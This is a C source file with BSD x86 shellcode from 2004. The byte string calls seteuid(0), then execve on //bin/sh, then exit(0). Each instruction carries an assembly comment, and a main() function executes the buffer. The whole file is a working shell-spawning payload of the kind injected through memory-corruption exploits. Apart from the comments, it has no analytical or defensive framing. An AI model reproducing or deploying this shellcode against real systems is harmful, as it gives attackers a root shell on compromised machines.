///////////////////////////////////////////////////
// Author:  Clown
// Contact: clown@hysteria.sk
// date:    Wed Oct 13 14:57:03 2004
//
// seteuid(0); execve //bin/sh, exit(0);
///////////////////////////////////////////////////

#include <stdio.h>

char BSD_shellcode[] =

	// seteuid(0);

	"\x29\xc0"		 // sub  %eax,%eax
	"\x50"			 // push %eax
	"\x50"			 // push %eax
	"\xb0\xb7"		 // mov  $0xb7,%al
	"\xcd\x80"		 // int  $0x80

	// execve //bin/sh
     
  	"\x29\xc0"		 // sub  %eax,%eax
	"\x68\x6e\x2f\x73\x68"   // push $0x68732f6e 
	"\x68\x2f\x2f\x62\x69"	 // push $0x69622f2f
  	"\x89\xe3"		 // mov  %esp,%ebx  	
	"\x50"			 // push %eax
	"\x54"			 // push %esp
	"\x53"			 // push %ebx
	"\x53"			 // push %ebx
        "\xb0\x3b"		 // mov  $0x3b,%al
        "\xcd\x80"               // int  $0x80   

	// exit(0);

	"\x28\xc0"		 // sub  %al,%al
	"\xfe\xc0"		 // inc  %al
	"\xcd\x80";		 // int  0x80
	
int main(void)
{
	void (*BSD)();
	(long) BSD = &BSD_shellcode;
	printf(" %d bytes\n",sizeof(BSD_shellcode));
	BSD();
}